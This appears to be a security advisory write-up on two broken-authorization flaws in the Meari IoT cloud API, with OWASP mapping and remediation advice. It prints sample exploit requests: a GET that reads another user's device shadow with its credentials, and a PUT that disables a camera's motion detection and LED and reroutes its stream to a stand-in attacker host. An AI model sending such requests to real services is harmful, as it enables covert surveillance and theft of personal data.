The Cybersecurity and Infrastructure Security Agency (CISA) has published advisory ICSA-26-274-06 revealing two significant authorization flaws in the Meari IoT Cloud Platform OpenAPI Service. Tracked as CVE-2026-101104 (CVSS 7.7) and CVE-2026-96613 (CVSS 6.5 / CVSS v4 7.1), the vulnerabilities represent classic Broken Object Level Authorization (BOLA / IDOR) weaknesses in cloud IoT backend microservices, enabling any authenticated API user to retrieve complete device shadows, credentials, and live telemetry for arbitrary IoT cameras and smart devices worldwide, as well as alter remote hardware configurations without owner authorization.
The Scale of White-Label IoT Cloud Ecosystems
Meari Technology is one of the world's largest OEM/ODM technology providers for smart surveillance cameras, baby monitors, smart doorbells, and IoT environmental sensors. Hundreds of commercial brands license Meari hardware and rely on the centralized Meari Cloud Platform to handle P2P video streaming, cloud recording, device provisioning, and remote firmware over-the-air (OTA) updates.
Because the backend OpenAPI microservices process telemetry for millions of connected endpoints globally, an authorization breakdown at the cloud layer exposes end-users and commercial enterprise deployments without requiring attackers to establish local network proximity to target devices.
Vulnerability Mechanics: BOLA Across Device Shadow Endpoints
Modern IoT platforms utilize a "device shadow" architecture (a persistent JSON document in cloud storage reflecting the current reported state and desired configuration of a physical IoT endpoint).
When a mobile app or enterprise management console interacts with the Meari OpenAPI, it issues REST requests containing a bearer authentication token. However, while the API gateway validated that the JWT token was authentic and signed, downstream microservices failed to verify whether the requesting user owned or was authorized to access the specific deviceId passed in the URL path or JSON payload:
GET /openapi/v1/devices/MR-CAM-98421094/shadow HTTP/1.1
Host: api.mearicloud.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
User-Agent: IoTClient/4.2
In response to this unauthorized request (CVE-2026-96613), the cloud service returns the complete JSON device shadow:
{
"code": 200,
"data": {
"deviceId": "MR-CAM-98421094",
"owner": {
"userId": "usr_998124",
"email": "facility_ops@target-enterprise.com",
"phone": "+1-555-0199"
},
"network": {
"ssid": "Corp_Facilities_Secure",
"wifiBssid": "00:14:22:01:23:45",
"localIp": "192.168.10.45",
"publicIp": "198.51.100.22"
},
"telemetry": {
"rtspStreamToken": "sec_tok_8492048fbc9",
"p2pUid": "TUTK-9842-CAM",
"firmwareVersion": "v4.1.2025"
}
}
}
Remote Configuration Injection (CVE-2026-101104)
Compounding the data exposure, CVE-2026-101104 allows an attacker to issue HTTP PUT requests to update the desired state of unowned devices:
PUT /openapi/v1/devices/MR-CAM-98421094/config HTTP/1.1
Host: api.mearicloud.com
Authorization: Bearer <attacker_valid_token>
Content-Type: application/json
{
"motionDetection": false,
"ledIndicator": false,
"streamReroute": "rtmp://attacker-node.internal/live"
}
The cloud message dispatcher immediately forwards MQTT control packets to the physical camera, disabling intrusion detection, extinguishing status LEDs to hide active viewing, or reorienting pan-tilt-zoom (PTZ) optics away from secured areas.
| OWASP API Category | Vulnerability Manifestation | Blast Radius | Remediation Standard |
|---|---|---|---|
| API1:2023 - Broken Object Level Authorization | GET /devices/{id}/shadow lacks user-device tenancy validation |
Global surveillance telemetry & credential leakage | Enforce tenancy check: verifyOwnership(user.id, device.id) |
| API5:2023 - Broken Function Level Authorization | PUT /devices/{id}/config accepts administrative toggles from foreign users |
Unauthorized physical device manipulation & stream hijacking | Role-based access control (RBAC) & device signature validation |
Recommendations for Enterprises and OEM Integrators
- Verify Cloud Gateway Fixes: Meari Technology has pushed cloud-side authorization enforcement across the OpenAPI service. Enterprise clients using custom API integration keys should re-test endpoints to confirm HTTP 403 Forbidden responses on unowned hardware IDs.
- Isolate IoT Surveillance on Dedicated VLANs: Never place smart cameras on enterprise data networks or employee Wi-Fi networks. Isolate cameras on isolated subnets with outbound firewall restrictions blocking unexpected cloud communication.
- Rotate Wi-Fi and Local RTSP Passwords: Because device shadows historically cached Wi-Fi SSIDs and local camera passwords in cloud telemetry, facilities should rotate local Wi-Fi credentials for IoT subnets.



